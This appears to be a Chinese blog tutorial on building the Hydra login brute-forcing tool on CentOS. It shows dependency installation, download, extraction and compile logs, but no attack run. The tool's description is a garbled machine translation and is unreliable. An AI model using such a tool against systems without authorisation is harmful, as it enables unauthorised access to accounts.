Linux的一个暴力破解工具九头蛇hydra

时间:2024-01-10 08:19:38

首先还是书写本文的

参考档:http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html

工具介绍:原文为官方英文解释本人给翻译下

数量最大的安全漏洞之一是密码,每个密码安全研究显示。 Hydra是一个parallized登录的裂解装置,它支持众多的协议来攻击。新的模块很容易的添加,旁边,它是灵活的,而且速度非常快。

水润测试上编译的Linux,Windows/ Cygwin的中,Solaris 11中的FreeBSD8.1和OSX,可根据GPLv3的一个特殊的OpenSSL许可证授权扩展。

目前该工具支持:
AFP,使思科,思科认证,思科AAA,CVS,火鸟,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP头,HTTP代理,HTTPS-FORM-GET,HTTPS-FORM POST,IMAP,HTTP代理,HTTPS的GET,HTTPS头,ICQ,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle的监听器,Oracle的SID,甲骨文,PCAnywhere中,PCNFS,POP3,POSTGRES,RDP,REXEC,Rlogin的,RSH,SAP/R3,SIP,SMB,SMTP,SNMP,SMTP枚举,SOCKS5,SSH(v1和v2),颠覆,使用TeamSpeak(TS2),远程登录,VMware的认证,VNC和XMPP。

对于HTTP,POP3,IMAP和SMTP,支持几个登录机制,如平原和MD5摘要等。

这个工具是一个概念证明代码,给研究人员和安全顾问可行显示,这将是多么容易获得未经授权的访问从远程系统。

面包车豪斯和大卫Maciejak的维护程序。

黑客选择
http://www.thc.org/thc-hydra

本人的实验环境借用了 centos6.3 这里注明下本人刚接触Linux是RHEL也就是RedHad的企业版本。了解CentOS后知道centos为rhel的克隆版理论是兼容rhel的所有包的

所以该下演示的步骤和包同样可用在rhel的OS上。假如你的服务器是RHEL的但为激活使用yum可以参考本人博客的博文 RHEL使用centos的yum源修改教程:http://www.cnblogs.com/patf/articles/3137348.html

废话不多说首先安装的是hydra的支持库包软件

 yum -y install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel 
假如-y选项,因为本人在安装的时候 没有加入所以有两三次提示我 -y可以默认yes
   Verifying  : subversion-devel-1.6.11-9.el6_4.i686                                  26/59
Verifying : db4-cxx-4.7.25-17.el6.i686 27/59
Verifying : postgresql-libs-8.4.13-1.el6_3.i686 28/59
Verifying : openldap-devel-2.4.23-32.el6_4.1.i686 29/59
Verifying : cyrus-sasl-plain-2.1.23-13.el6_3.1.i686 30/59
Verifying : openldap-2.4.23-32.el6_4.1.i686 31/59
Verifying : krb5-workstation-1.10.3-10.el6_4.3.i686 32/59
Verifying : cyrus-sasl-lib-2.1.23-13.el6_3.1.i686 33/59
Verifying : postgresql-devel-8.4.13-1.el6_3.i686 34/59
Verifying : expat-devel-2.0.1-11.el6_2.i686 35/59
Verifying : libcom_err-devel-1.41.12-14.el6.i686 36/59
Verifying : krb5-devel-1.10.3-10.el6_4.3.i686 37/59
Verifying : krb5-libs-1.10.3-10.el6_4.3.i686 38/59
Verifying : cyrus-sasl-2.1.23-13.el6_3.1.i686 39/59
Verifying : cyrus-sasl-lib-2.1.23-13.el6.i686 40/59
Verifying : cyrus-sasl-2.1.23-13.el6.i686 41/59
Verifying : libss-1.41.12-12.el6.i686 42/59
Verifying : openssl-1.0.0-20.el6_2.5.i686 43/59
Verifying : subversion-1.6.11-7.el6.i686 44/59
Verifying : cyrus-sasl-gssapi-2.1.23-13.el6.i686 45/59
Verifying : e2fsprogs-1.41.12-12.el6.i686 46/59
Verifying : openldap-2.4.23-26.el6.i686 47/59
Verifying : libcom_err-1.41.12-12.el6.i686 48/59
Verifying : zlib-1.2.3-27.el6.i686 49/59
Verifying : pcre-7.8-4.el6.i686 50/59
Verifying : libselinux-2.0.94-5.3.el6.i686 51/59
Verifying : cyrus-sasl-plain-2.1.23-13.el6.i686 52/59
Verifying : libselinux-utils-2.0.94-5.3.el6.i686 53/59
Verifying : libselinux-python-2.0.94-5.3.el6.i686 54/59
Verifying : krb5-workstation-1.9-33.el6.i686 55/59
Verifying : krb5-libs-1.9-33.el6.i686 56/59
Verifying : e2fsprogs-libs-1.41.12-12.el6.i686 57/59
Verifying : apr-1.3.9-3.el6_1.2.i686 58/59
Verifying : cyrus-sasl-md5-2.1.23-13.el6.i686 59/59 Installed:
openssl-devel.i686 0:1.0.0-27.el6_4.2 pcre-devel.i686 0:7.8-6.el6
postgresql-devel.i686 0:8.4.13-1.el6_3 subversion-devel.i686 0:1.6.11-9.el6_4 Dependency Installed:
apr-devel.i686 0:1.3.9-5.el6_2 apr-util-devel.i686 0:1.3.9-3.el6_0.1
cyrus-sasl-devel.i686 0:2.1.23-13.el6_3.1 db4-cxx.i686 0:4.7.25-17.el6
db4-devel.i686 0:4.7.25-17.el6 expat-devel.i686 0:2.0.1-11.el6_2
keyutils-libs-devel.i686 0:1.4-4.el6 krb5-devel.i686 0:1.10.3-10.el6_4.3
libcom_err-devel.i686 0:1.41.12-14.el6 libselinux-devel.i686 0:2.0.94-5.3.el6_4.1
libsepol-devel.i686 0:2.0.41-4.el6 openldap-devel.i686 0:2.4.23-32.el6_4.1
postgresql.i686 0:8.4.13-1.el6_3 postgresql-libs.i686 0:8.4.13-1.el6_3
zlib-devel.i686 0:1.2.3-29.el6 Dependency Updated:
apr.i686 0:1.3.9-5.el6_2 cyrus-sasl.i686 0:2.1.23-13.el6_3.1
cyrus-sasl-gssapi.i686 0:2.1.23-13.el6_3.1 cyrus-sasl-lib.i686 0:2.1.23-13.el6_3.1
cyrus-sasl-md5.i686 0:2.1.23-13.el6_3.1 cyrus-sasl-plain.i686 0:2.1.23-13.el6_3.1
e2fsprogs.i686 0:1.41.12-14.el6 e2fsprogs-libs.i686 0:1.41.12-14.el6
krb5-libs.i686 0:1.10.3-10.el6_4.3 krb5-workstation.i686 0:1.10.3-10.el6_4.3
libcom_err.i686 0:1.41.12-14.el6 libselinux.i686 0:2.0.94-5.3.el6_4.1
libselinux-python.i686 0:2.0.94-5.3.el6_4.1 libselinux-utils.i686 0:2.0.94-5.3.el6_4.1
libss.i686 0:1.41.12-14.el6 openldap.i686 0:2.4.23-32.el6_4.1
openssl.i686 0:1.0.0-27.el6_4.2 pcre.i686 0:7.8-6.el6
subversion.i686 0:1.6.11-9.el6_4 zlib.i686 0:1.2.3-29.el6 Complete!

到这里所以支持都安装完毕下面可以安装hydra了

可以到官方找最新的包也可以按一下的方法下载

 root@localhost ~]# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
--2013-06-18 23:02:32-- http://www.thc.org/releases/hydra-7.4.1.tar.gz
正在解析主机 www.thc.org... 199.58.210.16
正在连接 www.thc.org|199.58.210.16|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:666187 (651K) [application/x-gzip]
正在保存至: “hydra-7.4.1.tar.gz” 17% [==================> ] 114,105 35.6K/s eta(英国中部时19% [=====================> ] 131,481 38.3K/s eta(英国中部时23% [=========================> ] 154,649 41.7K/s eta(英国中部时28% [===============================> ] 190,849 47.6K/s eta(英国中部时34% [======================================> ] 227,049 53.7K/s eta(英国中部时36% [=========================================> ] 244,425 55.1K/s eta(英国中部时41% [==============================================> ] 273,385 58.6K/s eta(英国中部时46% [====================================================> ] 309,585 63.2K/s eta(英国中部时48% [======================================================> ] 322,617 62.4K/s eta(英国中部时53% [============================================================> ] 357,825 69.5K/s eta(英国中部时57% [=================================================================> ] 384,881 73.0K/s eta(英国中部时61% [=====================================================================> ] 406,601 83.8K/s eta(英国中部时62% [======================================================================> ] 415,289 82.7K/s eta(英国中部时71% [================================================================================> ] 473,209 95.3K/s eta(英国中部时74% [====================================================================================> ] 494,929 99.8K/s eta(英国中部时77% [=======================================================================================> ] 515,201 96.8K/s eta(英国中部时83% [===============================================================================================> ] 557,193 104K/s eta(英国中部时86% [==================================================================================================> ] 577,465 104K/s eta(英国中部时89% [=====================================================================================================> ] 594,841 95.4K/s eta(英国中部时94% [===========================================================================================================> ] 631,041 99.9K/s eta(英国中部时97% [===============================================================================================================> ] 651,313 98.4K/s eta(英国中部时100%[==================================================================================================================>] 666,187 94.0K/s in 8.6s 2013-06-18 23:02:41 (75.8 KB/s) - 已保存 “hydra-7.4.1.tar.gz” [666187/666187]) [root@localhost ~]# tar zxvf hydra-7.4.1.tar.gz
hydra-7.4.2/
hydra-7.4.2/bfg.c
hydra-7.4.2/bfg.h
hydra-7.4.2/CHANGES
hydra-7.4.2/configure
hydra-7.4.2/crc32.c
hydra-7.4.2/crc32.h
hydra-7.4.2/d3des.c
hydra-7.4.2/d3des.h
hydra-7.4.2/dpl4hydra.sh
hydra-7.4.2/dpl4hydra_full.csv
hydra-7.4.2/dpl4hydra_local.csv
hydra-7.4.2/hmacmd5.c
hydra-7.4.2/hmacmd5.h
hydra-7.4.2/hydra-afp.c
hydra-7.4.2/hydra-cisco-enable.c
hydra-7.4.2/hydra-cisco.c
hydra-7.4.2/hydra-cvs.c
hydra-7.4.2/hydra-firebird.c
hydra-7.4.2/hydra-ftp.c
hydra-7.4.2/hydra-gtk/
hydra-7.4.2/hydra-gtk/acconfig.h
hydra-7.4.2/hydra-gtk/aclocal.m4
hydra-7.4.2/hydra-gtk/AUTHORS
hydra-7.4.2/hydra-gtk/autogen.sh
hydra-7.4.2/hydra-gtk/ChangeLog
hydra-7.4.2/hydra-gtk/config.h
hydra-7.4.2/hydra-gtk/config.h.in
hydra-7.4.2/hydra-gtk/configure
hydra-7.4.2/hydra-gtk/configure.in
hydra-7.4.2/hydra-gtk/COPYING
hydra-7.4.2/hydra-gtk/INSTALL
hydra-7.4.2/hydra-gtk/install-sh
hydra-7.4.2/hydra-gtk/Makefile.am
hydra-7.4.2/hydra-gtk/Makefile.in
hydra-7.4.2/hydra-gtk/make_xhydra.sh
hydra-7.4.2/hydra-gtk/missing
hydra-7.4.2/hydra-gtk/mkinstalldirs
hydra-7.4.2/hydra-gtk/NEWS
hydra-7.4.2/hydra-gtk/README
hydra-7.4.2/hydra-gtk/src/
hydra-7.4.2/hydra-gtk/src/callbacks.c
hydra-7.4.2/hydra-gtk/src/callbacks.h
hydra-7.4.2/hydra-gtk/src/interface.c
hydra-7.4.2/hydra-gtk/src/interface.h
hydra-7.4.2/hydra-gtk/src/main.c
hydra-7.4.2/hydra-gtk/src/Makefile.am
hydra-7.4.2/hydra-gtk/src/Makefile.in
hydra-7.4.2/hydra-gtk/src/support.c
hydra-7.4.2/hydra-gtk/src/support.h
hydra-7.4.2/hydra-gtk/stamp-h.in
hydra-7.4.2/hydra-gtk/xhydra.glade
hydra-7.4.2/hydra-gtk/xhydra.gladep
hydra-7.4.2/hydra-http-form.c
hydra-7.4.2/hydra-http-proxy-urlenum.c
hydra-7.4.2/hydra-http-proxy.c
hydra-7.4.2/hydra-http.c
hydra-7.4.2/hydra-icq.c
hydra-7.4.2/hydra-imap.c
hydra-7.4.2/hydra-irc.c
hydra-7.4.2/hydra-ldap.c
hydra-7.4.2/hydra-logo.ico
hydra-7.4.2/hydra-logo.rc
hydra-7.4.2/hydra-mod.c
hydra-7.4.2/hydra-mod.h
hydra-7.4.2/hydra-mssql.c
hydra-7.4.2/hydra-mysql.c
hydra-7.4.2/hydra-ncp.c
hydra-7.4.2/hydra-nntp.c
hydra-7.4.2/hydra-oracle-listener.c
hydra-7.4.2/hydra-oracle-sid.c
hydra-7.4.2/hydra-oracle.c
hydra-7.4.2/hydra-pcanywhere.c
hydra-7.4.2/hydra-pcnfs.c
hydra-7.4.2/hydra-pop3.c
hydra-7.4.2/hydra-postgres.c
hydra-7.4.2/hydra-rdp.c
hydra-7.4.2/hydra-rexec.c
hydra-7.4.2/hydra-rlogin.c
hydra-7.4.2/hydra-rsh.c
hydra-7.4.2/hydra-sapr3.c
hydra-7.4.2/hydra-sip.c
hydra-7.4.2/hydra-smb.c
hydra-7.4.2/hydra-smtp-enum.c
hydra-7.4.2/hydra-smtp.c
hydra-7.4.2/hydra-snmp.c
hydra-7.4.2/hydra-socks5.c
hydra-7.4.2/hydra-ssh.c
hydra-7.4.2/hydra-sshkey.c
hydra-7.4.2/hydra-svn.c
hydra-7.4.2/hydra-teamspeak.c
hydra-7.4.2/hydra-telnet.c
hydra-7.4.2/hydra-vmauthd.c
hydra-7.4.2/hydra-vnc.c
hydra-7.4.2/hydra-xmpp.c
hydra-7.4.2/hydra.1
hydra-7.4.2/hydra.c
hydra-7.4.2/hydra.h
hydra-7.4.2/INSTALL
hydra-7.4.2/libpq-fe.h
hydra-7.4.2/LICENSE
hydra-7.4.2/LICENSE.OPENSSL
hydra-7.4.2/Makefile
hydra-7.4.2/Makefile.am
hydra-7.4.2/Makefile.orig
hydra-7.4.2/Makefile.unix
hydra-7.4.2/ntlm.c
hydra-7.4.2/ntlm.h
hydra-7.4.2/performance.h
hydra-7.4.2/postgres_ext.h
hydra-7.4.2/pw-inspector-logo.rc
hydra-7.4.2/pw-inspector.1
hydra-7.4.2/pw-inspector.c
hydra-7.4.2/pw-inspector.ico
hydra-7.4.2/rdp.h
hydra-7.4.2/README
hydra-7.4.2/sasl.c
hydra-7.4.2/sasl.h
hydra-7.4.2/xhydra.1
hydra-7.4.2/xhydra.png
[root@localhost ~]# cd hydra-7.4.
-bash: cd: hydra-7.4.: 没有那个文件或目录
[root@localhost ~]# cd hydra-7.4.
hydra-7.4.1.tar.gz hydra-7.4.2/
[root@localhost ~]# cd hydra-7.4.2/

这里有点搞笑了,下载了一个7.4.1的包解压是4.2的源 呵呵不管了反正新的包是向下兼容的进入到里面./configure --help下查看下

也没什么直接./configure  然后无报错就直接 make &&make install 即可

 root@localhost hydra-7.4.2]# ./configure 

 Starting hydra auto configuration ...
Detected 32 Bit Linux OS Checking for openssl (libssl, libcrypto, ssl.h, sha.h) ...
... found
Checking for idn (libidn.so) ...
... NOT found, unicode logins and passwords will not be supported
Checking for curses (libcurses.so / term.h) ...
... NOT found, color output disabled
Checking for pcre (libpcre.so, pcre.h) ...
... found
Checking for Postgres (libpq.so, libpq-fe.h) ...
... found
Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) ...
... found
Checking for firebird (libfbclient.so) ...
... NOT found, module firebird disabled
Checking for MYSQL client (libmysqlclient.so, math.h) ...
... NOT found, module Mysql will not support version > 4.x
Checking for AFP (libafpclient.so) ...
... NOT found, module Apple Filing Protocol disabled - Apple sucks anyway
Checking for NCP (libncp.so / nwcalls.h) ...
... NOT found, module NCP disabled
Checking for SAP/R3 (librfc/saprfc.h) ...
... NOT found, module sapr3 disabled
Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp
Checking for libssh (libssh/libssh.h) ...
... NOT found, module ssh disabled
Get it from http://www.libssh.org
Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) ...
... NOT found, module Oracle disabled
Get basic and sdk package from http://www.oracle.com/technetwork/database/features/instant-client/index.html
Checking for GUI req's (pkg-config, gtk+-2.0) ...
... NOT found, optional anyway Hydra will be installed into .../bin of: /usr/local
(change this by running ./configure --prefix=path) Writing Makefile.in ...
now type "make"
[root@localhost hydra-7.4.2]# make && make install
gcc -I. -O3 -o pw-inspector pw-inspector.c
gcc -I. -O3 -c hydra-vnc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-pcnfs.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-rexec.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-nntp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-socks5.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-telnet.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-cisco.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-http.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-ftp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-imap.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-pop3.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-smb.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-icq.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-cisco-enable.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-ldap.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-mysql.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-mssql.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-xmpp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-http-proxy-urlenum.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-snmp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-cvs.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-smtp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-smtp-enum.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-sapr3.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-ssh.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-sshkey.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-teamspeak.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-postgres.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-rsh.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-rlogin.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-oracle-listener.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-svn.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-pcanywhere.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-sip.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-oracle-sid.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-oracle.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-vmauthd.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-firebird.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-afp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-ncp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-http-proxy.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-http-form.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-irc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-rdp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c crc32.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c d3des.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c bfg.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c ntlm.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c sasl.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hmacmd5.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -c hydra-mod.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1
gcc -I. -O3 -lm -o hydra hydra.c hydra-vnc.o hydra-pcnfs.o hydra-rexec.o hydra-nntp.o hydra-socks5.o hydra-telnet.o hydra-cisco.o hydra-http.o hydra-ftp.o hydra-imap.o hydra-pop3.o hydra-smb.o hydra-icq.o hydra-cisco-enable.o hydra-ldap.o hydra-mysql.o hydra-mssql.o hydra-xmpp.o hydra-http-proxy-urlenum.o hydra-snmp.o hydra-cvs.o hydra-smtp.o hydra-smtp-enum.o hydra-sapr3.o hydra-ssh.o hydra-sshkey.o hydra-teamspeak.o hydra-postgres.o hydra-rsh.o hydra-rlogin.o hydra-oracle-listener.o hydra-svn.o hydra-pcanywhere.o hydra-sip.o hydra-oracle-sid.o hydra-oracle.o hydra-vmauthd.o hydra-firebird.o hydra-afp.o hydra-ncp.o hydra-http-proxy.o hydra-http-form.o hydra-irc.o hydra-rdp.o crc32.o d3des.o bfg.o ntlm.o sasl.o hmacmd5.o hydra-mod.o -lm -lssl -lpcre -lpq -lsvn_client-1 -lapr-1 -laprutil-1 -lsvn_subr-1 -lcrypto -L/usr/lib -L/usr/local/lib -L/lib -L/usr/lib -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H If men could get pregnant, abortion would be a sacrament Now type make install Now type make install
strip hydra pw-inspector
